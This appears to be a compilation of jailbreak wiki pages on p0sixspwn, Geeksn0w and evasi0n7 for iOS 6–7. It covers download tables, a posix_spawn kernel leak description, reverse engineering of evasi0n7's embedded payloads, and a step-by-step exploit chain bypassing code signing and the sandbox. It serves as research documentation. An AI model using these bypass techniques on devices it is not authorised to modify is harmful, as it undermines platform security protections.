| [https://MEGA.co.nz/#!hptDFbzb!Dfa8Th7Ngw6PyDSnWDyMmzHbGYDrMqk64kRMB4MCv0c MEGA]
| rowspan="2" |
* Supports iOS 6.1.6
* Fixes iTunes 11.1+ crashes
|-
| [[wikipedia:Microsoft Windows|Windows]]
| <code>5d2711a99433daa1800d1327207bfc870cd16698 </code>
| class="rborderplz nobrradiusplz" | [https://MEGA.co.nz/#!Rp12yZrK!EhZjmllrpQ4JDC7VvHbcUEautLNBSSFUgBzKFzB20js MEGA]
|}

== Exploits ==
* [[posix_spawn kernel information leak]] (by [[i0n1c]]) (proof? what is it used for?)
* [[mach_msg_ool_descriptor_ts for heap shaping]] (proof/quotes? no information found)
* [[AMFID_code_signing_evasion]]
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1273 CVE-2014-1273] (by [[planetbeing]]) (proof/quotes? no information found)
* [[DeveloperDiskImage race condition]] (by [[comex]]) (proof/quotes? no information found)
* [[Symbolic Link Vulnerability]]
* [[launchd.conf untether]]
* [[ARM TTE modifications to enable RW on certain segments]] (by [[winocm]])

== External Links ==
* [http://blog.ih8sn0w.com/2013/12/613-615-3gsa4-untether-cydia-package.html iH8sn0w's blog post on the release.]
* [http://p0sixspwn.com/ p0sixspwn]
* [https://github.com/p0sixspwn/p0sixspwn Source Code on GitHub]

[[Category:Hacking Software]]
[[Category:Jailbreaks]]

Posix spawn kernel information leak

2014-06-04T19:30:16Z

I3ppwn: /* Links */

Vulnerability used in [[p0sixspwn]]

== '''Vulnerability Part 1''' ==

There is an information leak vulnerabilty, which can be exploited to retrieve leaked bytes from the kernel heap. If you carefully craft the data's size, you can leak bytes from the heap using a ''PSFA_OPEN'' file action. The Size is crafted so that the beginning of the file name is within the buffer and the rest is taken in the heap, then you can use ''fcntl(F_GETPATH)'' to get the leaked bytes.

== '''Vulnerability Part 2''' ==

The ''posix_spawn()'' vulnerability isn't just a way to leak memory, this is also a race condition exploit, but you need a way to re-read the memory, and then write outside the buffer, then finaally you need to sync with a secondary thread via file locking. Like this ''open(..., O_EXLOCK )''. The p0sixspwn jailbreak also utilizes another exploit to change the ''fd_ofileflags'' relocation path.

== '''Credit''' ==

[[I0n1c]]

== '''Links''' ==

[http://antid0te.com/syscan_2013/SyScan2013_Mountain_Lion_iOS_Vulnerabilities_Garage_Sale_Whitepaper.pdf Writeup by i0n1c p. 20 ff.]
[http://conference.hitb.org/hitbsecconf2013kul/materials/D2T2%20-%20Stefan%20Esser%20-%20Tales%20from%20iOS%206%20Exploitation%20and%20iOS%207%20Security%20Changes.pdf i0n1c's writeup]

Posix spawn kernel information leak

2014-06-04T19:28:49Z

I3ppwn: /* Vulnerability */

Geeksn0w

2014-05-01T11:29:31Z

I3ppwn: /* The Semi-Tether */

{{other|tethered jailbreak for iOS 7.1.x|untethered jailbreak for iOS 7.0.x|evasi0n7}}
{{Infobox software
| name = Geeksn0w
| title = Geeksn0w
| logo = [[File:Geeksn0w.png|75px]]
| screenshot = [[File:Geeksn0w_2.8.2.png|250px]]
| caption = Geeksn0w 2.8.2 on Windows 7
| author = [http://twitter.com/blackgeektuto BlackGeek]
| developer = [http://twitter.com/blackgeektuto BlackGeek]
| released =
| discontinued =
| latest release version = 2.9
| latest release date = {{Start date and age|2014|4|25|df=yes}}
| latest preview version =
| latest preview date =
| programming language = .NET Visual Basic
| operating system = [[wikipedia:Microsoft Windows|Windows]]
| size =
| platform =
| language = [[wikipedia:English|English]]
| status = Active
| genre = Jailbreaking
| license = [[wikipedia:Freeware|Freeware]]
| website = [http://Geeksn0w.it Geeksn0w.it]
}}

'''Geeksn0w''' is a [[jailbreak]] program that currently performs a semi-[[tethered jailbreak]] for the [[iPhone 4]] on iOS 7.1.x.

== Supported Devices and Requirements==
The only supported devices are those of the [[iPhone 4]]. This is because Geeksn0w uses [[opensn0w]] and [[geohot]]'s [[limera1n exploit]] which is only available for [[A4]]-based devices and the [[iPhone 4]] is the only [[A4]] device that runs [[iOS]] 7.
Geeksn0w currently only supports Windows (unless you use BootCamp or another VM on your Mac to install Windows). Geeksn0w requires [http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html Java Development Kit for 32-bit PCs] and [http://www.microsoft.com/net .NET Framework] installed on your computer to be able to run. Unlike other jailbreak tools (such as [[evasi0n7]]), Geeksn0w does not need iTunes to be installed.

==Versions and Updates==
Geeksn0w originally performed an [[tethered jailbreak]] on [[iOS]] 7.0 on the [[iPhone 4]] until [[evasi0n7]] was released. BlackGeek then updated Geeksn0w to use the same exploits as [[evasi0n7]] for all devices. Versions 2.5 and above perform a tethered jailbreak on iOS 7.1 for the iPhone 4. Version 2.9 performs a semi-tethered jailbreak on iOS 7.1 and 7.1.1.

===Download===
{| class="wikitable" style="text-align:center;"
! Version
! OS
! Download
! Changelog
|-
! 2.5
| class="noborderplz" rowspan="8" | [[wikipedia:Microsoft Windows|Windows]]
| ?
| First release that jailbreaks iOS 7.1
|-
! 2.6
| ?
| ?
|-
! 2.7
| ?
|
* Added official Cydia 1.1.9 build
* Fixed Mail, Safari, Calculator and Weather crash after tetherboot
* Added auto-Hacktivation for locked iPhones
* Fixed a bug in the Progress Bar
* Added iDevice arch finder: now GeekSn0w can auto-detect your iPhone model
* Improved speed of root_fs mount
* Fixed mount.sh error
* Reduced the .exe size
* Speeded up the Jailbreak process
* Added AFC2 protocol (iFunBox, iExplorer)
|-
! 2.8
| [http://www.geeksn0w.it/GeekSn0w/Releases/Windows/geeksn0w_win_2.8_7c148dc55660b4466dade25aa19bb.zip geeksn0w.it]
|
* Fixed a huge bug of GeekSn0w's dfuarch extension
|-
! 2.8.1
| [http://www.geeksn0w.it/GeekSn0w/Releases/Windows/geeksn0w_win_2.8.1_0b65917a7fd23e279ac97763338ecf.zip geeksn0w.it]
|
* Removed "dfuarch", now GeekSn0w uses iRecovery to identify the iPhone model
* Fixed "New Curses" installation error
|-
! 2.8.2
| [http://www.geeksn0w.it/GeekSn0w/Releases/Windows/geeksn0w_2.8.2_win_c7e3b8f62934143a93e69042c9de96f.zip geeksn0w.it]
|
* Fixed an issue with iPhone 3,2 and 3,3 Jailbreak's process
|-
! 2.8.3
| [http://www.geeksn0w.it/GeekSn0w/Releases/Windows/geeksn0w_win_2.8.3_3f17cffb2b38bc34a5d3dae91da8c2b.zip geeksn0w.it]
|
* Fixed an issue with New Curses installation
|-
! 2.9
| [http://www.geeksn0w.it/GeekSn0w/Releases/Windows/geeksn0w_win_2.9_6322a7e8d3b4bfefe9f585beb7d6d4a5.zip geeksn0w.it]
|
* Updated Jailbreak payload: now GeekSn0w executes a Semi-Untethered Jailbreak
* Updated .NET Framework version of some resources
* Removed Respring after any reboot: now all the hack stuff is executed during Apple Logo stage
|}

==How it works==
Geeksn0w uses msftguy and DevBug's SSH RamDisk tool which uses and [[geohot]]'s [[limera1n exploit]] to obtain root access. It then installs Cydia and mounts the root filesystem. It then uses [[opensn0w]] to boot the [[iPhone 4]] tethered. Geeksn0w is technically a GUI of [[opensn0w]] and ssh_rd.
===The Semi-Tether===
When the device is booted, it uses a LaunchDaemon to start a script in /gfix that reinstalls MobileSubstrate and PreferenceLoader from a local package and then kills the springboard and remounts the system partition as r/w. At installation time it sets the 'nvram' variable boot-args to true, which prevents [[Recovery Mode]]. However, it reinstalls MobileSubstrate and PreferenceLoader from a local package, which prevents [[saurik]] from updating it. It also kills the [[SpringBoard]] which adds additional boot time, and it remounts the fs after the first [[SpringBoard]] launch, which may cause other LaunchDaemons that needs r/w at boot time to fail. This is why many people have made their own SemiTether packages that use the 'dirhelper' which is being executed during the boot, to remount the fs and looping through /etc/rc.d and execute every binary there, just like [[evasi0n7]] does, which directly injects MobileSubstrate. They then use 'auto-boot' to prevent Recovery Mode'. This resulting package boots faster and is far more efficient than the way it is currently used by.

==The Semi-Tether==
*On April 21, 2014, BlackGeek announced on Twitter that he had achieved a [[Tethered_jailbreak#Using_a_tethered_(or_semi-tethered)_jailbreak|Semi-Tethered Jailbreak]] on the iPhone 4 on 7.1<ref>https://twitter.com/blackgeektuto/status/458283310100541441</ref>. On April 25, BlackGeek updated Geeksn0w to version 2.9 which achieved a semi-tethered jailbreak for 7.1 or 7.1.1. He also added the semi-tether package to his repo (http://geekrepo.beiphone.it) for people who had already jailbroken tethered on 7.1 and wanted to upgrade to Semi-Tethered.
*The semi-untether is pretty simple it uses the mount_hfs binary to mount /dev/disk0s1s1 to /, The reason why this is not an untethered jb is because there is no kernel exploit.

==Exploits==
*[[geohot]]'s [[Limera1n exploit]] - Tethered
*? - Semi-Tethered

==See Also==
*[[Tethered jailbreak]]
*[[limera1n exploit]]
*[[opensn0w]]
*[http://twitter.com/blackgeektuto BlackGeek] on Twitter

==References==
<references/>

[[Category:Jailbreaks]]

Evasi0n7

2014-02-27T18:15:16Z

I3ppwn: Spelling Mistakes Corrected

{{lowercase}}
{{other|untethered jailbreak for iOS 7|untethered jailbreak for iOS 6.0 through 6.1.2|evasi0n}}
{{Infobox software
| name = TinyUmbrella
| title =
| logo = [[File:Evasi0n.png|128px]]
| screenshot = [[File:Evasi0n7.png|241px]]
| caption = evasi0n7 1.0.4 on OS X
| author = [[evad3rs]]
| developer = [[evad3rs]]
| released = {{Start date|2013|12|22|df=yes}}
| discontinued =
| latest release version = 1.0.5
| latest release date = {{Start date and age|2014|2|5|df=yes}}
| latest preview version =
| latest preview date =
| programming language = C?
| operating system = [[wikipedia:Microsoft Windows|Windows]] / [[wikipedia:OS X|OS X]]
| size =
| platform =
| language = [[wikipedia:English|English]]
| status = Active
| genre = Jailbreaking
| license = [[wikipedia:Freeware|Freeware]]
| website = [http://evasi0n.com evasi0n.com]
}}

'''evasi0n7''' is a [[jailbreak]] program from the [[evad3rs]]. It performs an [[untethered jailbreak]] for all devices on iOS 7.0 through 7.1 beta 3, except the [[Apple TV]]. It was initially released on 22 December 2013, and became subject to [[#Controversy|controversy and criticism]]. On 28 December 2013, the Cydia package went live to saurik's repo.

== Controversy ==
The release of evasi0n7 was met with sharp criticism. It came without advance notice, much to the dismay of jailbreak developers, including [[saurik]].<ref>https://twitter.com/saurik/status/414743665362231296</ref> It is believed that this was done in response to [[User:Geohot|Geohot]] trying to sell the jailbreak,<ref>https://twitter.com/superMTW/status/414821856534081536</ref> a claim which [[User:Geohot|Geohot]] later brushed off.<ref>https://twitter.com/tomcr00se/status/414826291309731840</ref> In addition, if the user's language was set to Chinese, a different app store would be installed by default. This store contained cracked versions of [[App Store]] apps and [[Cydia]] apps.<ref>https://twitter.com/saurik/status/414810297937838080</ref><ref>https://twitter.com/chpwn/status/414879769872703488</ref> The [[evad3rs]] were reportedly unaware of the included piracy when they formed the deal,<ref>[http://evasi0n.com/l.html Letter to the Community - evad3rs]</ref> and remotely disabled its installation several hours later.<ref>https://twitter.com/pod2g/status/414942393830756352</ref>

== Supported Devices ==
The only unsupported devices are those of the [[Apple TV]] family. All other devices capable of running [[iOS]] 7 are supported.

== Download ==
{| class="wikitable"
! Version
! OS
! SHA-1 Hash
! colspan="2" | Download
! Changes
|-
! rowspan="2" | 1.0.0
| [[wikipedia:OS X|OS X]]
| <code>6b22e1d94988a76244d08a5592576f61a0cb5ffb</code>
| [https://evad3rs.app.box.com/s/q4xydmi2qzgqdhqr35i0 Box]
| [https://mega.co.nz/#!gp9z2RTJ!VWcrCkGWqGp-0Ijk4mKRQzE_ZdU1F0ojA5aKO7Ki7jo Mega]
| rowspan="2" | Initial release
|-
| [[wikipedia:Microsoft Windows|Windows]]
| <code>8a4e1fcd7b1fc0084366c182cbcf850dfc45d59f</code>
| [https://evad3rs.app.box.com/s/hzapsnk73mbrs770z50y Box]
| class="rborderplz" | [https://mega.co.nz/#!Al0lEAzA!CEbvejP3cU2cstBT9w2apzLEMYAKFy8qu0K3Z6mjShA Mega]
|-
! rowspan="2" | 1.0.1
| OS X
| <code>12b98c49046157b6206d1c099fe872d6c5e79fb1</code>
| [https://evad3rs.box.com/s/gux5ojfn1sbztkkf9u9g Box]
| [https://mega.co.nz/#!Q4d2GByI!D1lW_kLGtmH0sMgb7vdxFQMtQfEfeBPhykyJzcug3D4 Mega]
| rowspan="2" | TaiG is not bundled and not installed anymore with evasi0n7 in Chinese language operating systems
|-
| Windows
| <code>52367f1fb3b71b38ad9ba3ac427a771a498790ad</code>
| [https://evad3rs.box.com/s/u9ucoter5usl2at7ax29 Box]
| class="rborderplz" | [https://mega.co.nz/#!U09F0LaL!NP9vXy72p652fFWBcR_4LiqX-t1HnG4qdHDcHUH2rGY Mega]
|-
! rowspan="2" | 1.0.2
| OS X
| <code>da8d03d9e678f5866af0babe1882fa27cd236bad</code>
| [https://evad3rs.box.com/s/d3rjztbj6ism1067j3iz Box]
| [https://mega.co.nz/#!FtNw0CYa!XCgwIH7dBb4CJf5VLHM5KTFfZb9ms8iUYb1AlA4iGlc Mega]
| rowspan="2" | Fix for [[k93ap|iPad 2 (iPad2,1)]] boot loop issues.
|-
| Windows
| <code>d61c8cbb565efa7d651e3c6cdc8429e2446396d1</code>
| [https://evad3rs.box.com/s/tlr9ruitbfdqt3nxv3li Box]
| class="rborderplz" | [https://mega.co.nz/#!clEhBAZC!XG4Va2R4dHXj8sMddcJSNGgwkkRqHxgk73_n-FXC8KM Mega]
|-
! rowspan="2" | 1.0.3
| OS X
| <code>da50834734eb013982de5e6f7dda79660f655c18</code>
| [https://evad3rs.box.com/s/nb6hq1wol2mrjbfuzkbv Box]
| [https://mega.co.nz/#!F4M1zT5R!OgcsCUwMbIjxdHniB321Bg787zkE60Q9hxFDLi8dc-c Mega]
| rowspan="2" |
* Updated bundled Cydia
* Now double checking HFS modifications (for the [[j86ap|iPad mini 2G (iPad4,5)]] reboot loop issue)
* Support for iOS 7.1 beta 3
|-
| Windows
| <code>57e94aadcc30fc778dc0478ac6e89f19904adcf6</code>
| [https://evad3rs.box.com/s/27bu5nlp7cvxd2eny86d Box]
| class="rborderplz" | [https://mega.co.nz/#!clEhBAZC!XG4Va2R4dHXj8sMddcJSNGgwkkRqHxgk73_n-FXC8KM Mega]
|-
! rowspan="2" | 1.0.4
| OS X
| <code>879060a10942011da7ad5697e65122de6e25a3a1</code>
| [https://evad3rs.box.com/s/w5d8jf1pjbsvcu6b5i49 Box]
| [https://mega.co.nz/#!ktMTkSwZ!fxcFv2wDaDTpHBBmXRAZ-3NlwAJgPNqa3Gi-WDe0O7M Mega]
| rowspan="2" |
* Security fix: kernel payload now restores <code>sysent</code> table
* Security fix: code fix for bootstrap Cydia tar files verification
|-
| Windows
| <code>3ef7cb618288a9ff1220a71a2f887e21779c3a16</code>
| [https://evad3rs.box.com/s/w71wg4tv9s2m54ivzsfr Box]
| class="rborderplz" | [https://mega.co.nz/#!xtUw3QaC!DtaNWFLUr9SroeG6OWg5t2s9a6EkD-qNqsb4amiRX3o Mega]
|-
! rowspan="2" | 1.0.5
| OS X
| <code>a81a7128113a7610371a2f9f99933a1dbd153c42</code>
| [https://evad3rs.box.com/shared/static/gxbuuu3bax7hqvca4th5.dmg Box]
| [https://mega.co.nz/#!0oMFBTJS!YbZUVe6mRN039O5EnFbtkEWsm6wJc-8b_1LMWIoKIVY Mega]
| rowspan="2" | Support for [[iOS]] 7.0.5.
|-
| Windows
| <code>5e09dfac4b4a0361492961109da72f6f18020d59</code>
| [https://evad3rs.box.com/shared/static/ntgvz5os907szqm8wrm2.zip Box]
| class="rborderplz" | [https://mega.co.nz/#!5oViQCwY!bojgnL1AvGBpJzySFHtdfBg17d6HBk5nWj4RJKjWj40 Mega]
|-
! rowspan="2" | 1.0.6
| OS X
| <code>f77a75a092dbbeb483e3138392253413355e2e17</code>
| [https://evad3rs.box.com/shared/static/4r8pbr815z75xn180w29.dmg Box]
| [https://mega.co.nz/#!9kliwbLa!2fQKM0WmVZuCDTKC4N5u6v_bROaluqU8NSUbpOu0ifs Mega]
| rowspan="2" | Support for [[iOS]] 7.0.6.
|-
| Windows
| <code>5bda570b03aebad86286dd446bb4a1edf015b051</code>
| [https://evad3rs.box.com/shared/static/6gkfbxr0d1cmxls4gdkl.zip Box]
| class="nobrradiusplz rborderplz " | [https://mega.co.nz/#!o1FAUIzD!9byg8ik89yxSCkT5VTK8Xqhw_SYDKVIo41zO5_gOTJ0 Mega]
|}

== Research ==

=== Mach-O (OS X binary) ===

evasi0n7 is a single architecture (i386) unsigned binary. The app is self-contained, meaning it packages all of its resources into the Mach-O. Using [http://www.newosxbook.com/files/jtool.tar jtool] to inspect the Mach-O header of the binary shows that there is some added sections in the <code>__DATA</code> segment.

<code>
bash$ jtool -l ./evasi0n\ 7.app/Contents/MacOS/evasi0n7
...
LC 02: LC_SEGMENT Mem: 0x00170000-0x01d09000 __DATA
Mem: 0x00170000-0x00170008 __DATA.__dyld
Mem: 0x00170008-0x00170060 __DATA.__nl_symbol_ptr (Non-Lazy Symbol Ptrs)
Mem: 0x00170060-0x001703d4 __DATA.__la_symbol_ptr (Lazy Symbol Ptrs)
Mem: 0x001703d4-0x001703d8 __DATA.__mod_init_func (Module Init Function Ptrs)
Mem: 0x001703d8-0x001705d0 __DATA.__const
Mem: 0x001705d0-0x00171c14 __DATA.__data
Mem: 0x00171c14-0x00171c64 __DATA.__cfstring
 Mem: 0x00171c64-0x001a942d __DATA.data_3
Mem: 0x001a942d-0x0087b92c __DATA.data_4
Mem: 0x0087b92c-0x0087be18 __DATA.data_5
Mem: 0x0087be18-0x0087c2f8 __DATA.data_6
Mem: 0x0087c2f8-0x008fb944 __DATA.data_7
Mem: 0x008fb944-0x008fba7f __DATA.data_8
Mem: 0x008fba7f-0x008fbeac __DATA.data_9
Mem: 0x008fbeac-0x0160f3a1 __DATA.data_10
Mem: 0x0160f3a1-0x016101ac __DATA.data_11
Mem: 0x016101ac-0x01d083dd __DATA.data_12 
Mem: 0x01d08400-0x01d084cc __DATA.__common (Zero Fill)
Mem: 0x01d084cc-0x01d0866c __DATA.__bss (Zero Fill)

...
</code>

The Mach-O ABI<ref>https://developer.apple.com/library/mac/documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html#//apple_ref/doc/uid/TP40000895-CH248-95693</ref> describes the __DATA segment as:
<blockquote>The __DATA segment contains writable data. The static linker sets the virtual memory permissions of this segment to allow both reading and writing. Because it is writable, the __DATA segment of a framework or other shared library is logically copied for each process linking with the library. When memory pages such as those making up the __DATA segment are readable and writable, the kernel marks them copy-on-write; therefore when a process writes to one of these pages, that process receives its own private copy of the page.</blockquote>
This means additional sections can be added using compiler flags, and these will be treated as raw data and added to the header and binary contents. Specifically they were called '''data_3''' through '''data_12''', and this is where the payloads used for jailbreak process are stored. At runtime, the evasi0n app was loading these data segments into memory to prepare to use them when jailbreaking.

=== Payload Extraction ===
The locations of the payloads have been identified, and they can be extracted and examined. To extract the payloads from the binary and dump the data into a file that can be examined:

<code>
bash$ jtool -e __DATA.data_3 ./evasi0n\ 7.app/Contents/MacOS/evasi0n7
Requested section found at Offset 1510500
Extracting __DATA.data_3 at 1510500, 227273 (377c9) bytes into evasi0n7.__DATA.data_3
</code>

=== Payload Format ===

Before examining the dumped payload files, some information can be gathered from other parts of the Mach-O binary. By dumping the symbol table from the binary, it is possible to see the names of functions used in the binary that are linked to in external libraries. Something that stands out in the evasi0n binary is the usage of the gzip library.

<code>
bash $ dsymutil -s ./evasi0n\ 7.app/Contents/MacOS/evasi0n7
----------------------------------------------------------------------
Symbol table for: './evasi0n 7.app/Contents/MacOS/evasi0n7' (i386)
----------------------------------------------------------------------
Index n_strx n_type n_sect n_desc n_value
======== -------- ------------------ ------ ------ ----------------
...
[ 164] 00000ab1 01 ( UNDF EXT) 00 0a00 0000000000000000 '_getcwd'
[ 165] 00000ab9 01 ( UNDF EXT) 00 0a00 0000000000000000 '_getsectdata'
"_getsectdata" Suggests it is used to get the data from a particular data section from the Mach-O header
[ 166] 00000ac6 01 ( UNDF EXT) 00 0100 0000000000000000 '_gzclose'
[ 167] 00000acf 01 ( UNDF EXT) 00 0100 0000000000000000 '_gzopen'
[ 168] 00000ad7 01 ( UNDF EXT) 00 0100 0000000000000000 '_gzread'
[ 169] 00000adf 01 ( UNDF EXT) 00 0100 0000000000000000 '_gzseek'
[ 170] 00000ae7 01 ( UNDF EXT) 00 0100 0000000000000000 '_inflate'
[ 171] 00000af0 01 ( UNDF EXT) 00 0100 0000000000000000 '_inflateEnd'
[ 172] 00000afc 01 ( UNDF EXT) 00 0100 0000000000000000 '_inflateInit2_'
...
</code>

From that, it can be deduced that the payloads that were extracted are compressed using gzip. This can be verified by running the command <code>file</code> on the extracted payloads.

<code>
bash $ file ./evasi0n7.__DATA.data_3 
evasi0n7.__DATA.data_3: gzip compressed data, from Unix, last modified: Sun Dec 22 05:54:11 2013
</code>

After decompressing the gzip file there is a new file, again test that with <code>file</code>.

<code>
bash $ mv ./evasi0n7.__DATA.data_3 ./evasi0n7.__DATA.data_3.gz
bash $ gunzip ./evasi0n7.__DATA.data_3.gz
bash $ file ./evasi0n7.__DATA.data_3
evasi0n7.__DATA.data_3: POSIX tar archive
</code>

Seems that the payloads were stored as simply <code>.tar.gz</code> files dumped directly into the Mach-O header of the binary.

=== Payload Contents ===

Now having an understanding of how the payloads were supposed to be used and packaged, their contents can be examined in detail to see what they are used for.

<code>
bash $ tar ztvf ./evasi0n7.__DATA.data_3 
drwxr-xr-x 0 planetbeing staff 0 Dec 22 00:20 ./
drwxr-xr-x 0 planetbeing staff 0 Dec 17 18:27 ./Applications/
drwxr-xr-x 0 planetbeing staff 0 Dec 21 07:25 ./etc/
drwxr-xr-x 0 planetbeing staff 0 Dec 18 18:34 ./private/
drwxr-xr-x 0 planetbeing staff 0 Dec 18 18:57 ./usr/
drwxr-xr-x 0 planetbeing staff 0 Dec 19 04:18 ./usr/bin/
drwxr-xr-x 0 planetbeing staff 0 Oct 31 23:14 ./usr/libexec/
drwxr-xr-x 0 planetbeing staff 0 Dec 18 19:11 ./usr/libexec/cydia/
-rwxr-xr-x 0 planetbeing staff 3363 Dec 18 23:59 ./usr/libexec/cydia/firmware.sh
-rwxr-xr-x 0 planetbeing staff 228 Dec 17 20:43 ./usr/libexec/cydia/free.sh
-rwxr-xr-x 0 planetbeing staff 132848 Dec 18 18:57 ./usr/bin/gssc
-rwxr-xr-x 0 planetbeing staff 200352 Dec 19 04:18 ./usr/bin/uicache
drwxr-xr-x 0 planetbeing staff 0 Dec 18 18:34 ./private/var/
drwxr-xr-x 0 planetbeing staff 0 Dec 18 18:34 ./private/var/lib/
drwxr-xr-x 0 planetbeing staff 0 Dec 18 18:34 ./private/var/lib/dpkg/
drwxr-xr-x 0 planetbeing staff 0 Dec 22 00:12 ./private/var/lib/dpkg/info/
-rw-r--r-- 0 planetbeing staff 393 Dec 18 18:40 ./private/var/lib/dpkg/info/com.evad3rs.evasi0n7.list
-rwxr-xr-x 0 planetbeing staff 678 Dec 18 18:52 ./private/var/lib/dpkg/info/com.evad3rs.evasi0n7.prerm
-rw-r--r-- 0 planetbeing staff 5137 Dec 22 00:12 ./private/var/lib/dpkg/info/cydia.list
drwxr-xr-x 0 planetbeing staff 0 Dec 21 23:31 ./Applications/Cydia.app/
-rwxr-xr-x 0 planetbeing staff 211 Dec 21 22:52 ./Applications/Cydia.app/Cydia
-rwsr-sr-x 0 planetbeing staff 131824 Dec 22 00:00 ./Applications/Cydia.app/CydiaWrapper
-rwsr-sr-x 0 planetbeing staff 382608 Dec 17 20:50 ./Applications/Cydia.app/MobileCydia
-rwxr-xr-x 0 planetbeing staff 66960 Dec 22 00:04 ./Applications/Cydia.app/udidfix.dylib
</code>

* __data3 contains Cydia.
* __data4 contains Cydia subsystems (/bin, /usr/bin) and their supported libraries (/usr/lib) 
* __data5 contains a Mach-O universal binary (ARMv7/ARMv7s,ARMv8) which is installed in the root file system 
* __data6 contains a dylib (likely game over.dyliib) which exports the same symbols as libmis.dylib (used by amfid for code signature verification), but overrides them to return true 
* __data7 contains another Mach-O binary (ARMv7/ARMv8), likely evasi0n7, which is installed in the root filesystem during the jailbreak 
* __data8 contains the plist (property list) file used by evasion to register as a launchDaemon 
* __data9 contains a dylib which overrides the sandbox dylib (similar to __data6, but to enable evasion to avoid the sandbox) 
* __data10 contained the TaiG app and subsystems (similar to Cydia) - removed in 1.01 due to negative backlash
* __data11 contains a binary plist of strings used by the evasion binary 
* __data12 contains the Cydia repo list

=== Network Access ===

Noteably, when attempting to run the evasi0n.app without an active or accessible network connection, it will display a prompt that says it requires a network connection to be used. This is very true, as it needs to download the WWDC app as part of the exploit. However the app doesn't exhibit any of the typical commands for network access via Cocoa or CF APIs. Examining the symbol table we do see that there are references to "send", "recv", and other C-socket calls, however they appear to be used exclusively for the unix socket to communicate directly with the iOS device.

Examining the list of libraries linked to the binary gives some insight to how it was checking for a network connection.

<code>
bash $ otool -L ./evasi0n\ 7.app/Contents/MacOS/evasi0n7 
./evasi0n 7.app/Contents/MacOS/evasi0n7:
/usr/lib/libz.1.dylib (compatibility version 1.0.0, current version 1.2.5)
/usr/lib/libxml2.2.dylib (compatibility version 10.0.0, current version 10.9.0)
/usr/lib/libssl.0.9.8.dylib (compatibility version 0.9.8, current version 50.0.0)
/usr/lib/libcrypto.0.9.8.dylib (compatibility version 0.9.8, current version 50.0.0)
/usr/lib/libcurl.4.dylib (compatibility version 7.0.0, current version 8.0.0)
/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation (compatibility version 150.0.0, current version 855.11.0)
/usr/lib/libobjc.A.dylib (compatibility version 1.0.0, current version 228.0.0)
/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit (compatibility version 1.0.0, current version 275.0.0)
/System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa (compatibility version 1.0.0, current version 20.0.0)
/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1197.1.1)
/usr/lib/libstdc++.6.dylib (compatibility version 7.0.0, current version 60.0.0)
/usr/lib/libgcc_s.1.dylib (compatibility version 1.0.0, current version 2577.0.0)
/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit (compatibility version 45.0.0, current version 1265.0.0)
/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation (compatibility version 300.0.0, current version 1056.0.0)
</code>

This stands out due to the compatibility version listed being higher than the version OS X 10.6.8, which was oldest version of OS X that evasi0n.app claimed to support. Checking the symbol table again evidence of how <code>libcurl</code> can be seen.

<code>
bash $ dsymutil -s ./evasi0n\ 7.app/Contents/MacOS/evasi0n7 
----------------------------------------------------------------------
Symbol table for: './evasi0n 7.app/Contents/MacOS/evasi0n7' (i386)
----------------------------------------------------------------------
Index n_strx n_type n_sect n_desc n_value
======== -------- ------------------ ------ ------ ----------------
...
[ 133] 00000938 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_easy_cleanup'
[ 134] 0000094b 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_easy_getinfo'
[ 135] 0000095e 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_easy_init'
[ 136] 0000096e 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_easy_perform'
[ 137] 00000981 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_easy_setopt'
[ 138] 00000993 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_easy_strerror'
[ 139] 000009a7 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_global_cleanup'
[ 140] 000009bc 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_global_init'
[ 141] 000009ce 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_slist_append'
[ 142] 000009e1 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_slist_free_all'
...
</code>

Digging into the code in the binary, it appears as these commands are used to do a check against the address <code>http://evasi0n.com/ex.plistx</code>. This appears to be a binary file that dictates the internal operation of the evasi0n7.app. Specifically it is known to be able to enable and disable ability to install the TaiG payloads.

=== Language Checks ===

The major controversy surrounding this release was that the evasi0n7.app would do a check against the locale and language settings of the computer being run on to see if it was set to Chinese. If this check was successful, it would install the TaiG app store by default instead of Cydia, and present Cydia as a secondary option. This was quickly discovered and patched to remove this functionally by both TaiG and [https://twitter.com/Dirk_Gently @Dirk_Gently].

{| class="wikitable"
! Version
! OS
! Offset
! Changes
! Result
|-
| rowspan="2" | 1.0.0 (evad3rs)
| [[wikipedia:OS X|Mac OS X]]
| 0xb0947
| Modify String "zh" to "xx"
| rowspan="3" | Check always fails
|-
| rowspan="2" | [[wikipedia:Microsoft Windows|Windows]]
| rowspan="2" | 0x2e5f8
| class="nobrradiusplz rborderplz" | Replace "E8C30000008A00" with "9090909090B000"
|-
| 1.0.0 (TaiG)
| class="nobrradiusplz rborderplz" | Replace "9090909090B001" with "9090909090B000"
|}

== Exploit Breakdowns ==

=== [http://pastebin.com/mT2n7uyj Write-up by Braden Thomas] ===

* WWDC.app is downloaded from app store and uploaded over AFC to ~/Media/Downloads

* An IPA containing WWDC.app is uploaded and installed using MobileInstall, but first, the Info.plist in the WWDC app in the IPA is changed so that CFBundleExecutable points to the untouched copy of the app in Downloads

* when MobileInstall installs the app, it signature checks the copy in Downloads, signature check passes and app is installed

* WWDC.app/WWDC is overwritten using AFC with a #! script to point to afcd the command line in #! will expose the entire / over afc port 8888

* a dylib (gameover) is uploaded which uses a CS bypass (vmsize 0) to neuter sandboxing in afcd using LINKEDIT section (afcd starts its sandbox at runtime using sandbox_init*)
* a LaunchServices bug is used to make that app load that library when it runs the device reboots and the user is instructed to run the app

* when the app runs, afcd runs exposing /, and the sandbox is neutered, allowing access everywhere however, iOS 7 kernel still prevents remapping / as writable so it's still just readonly

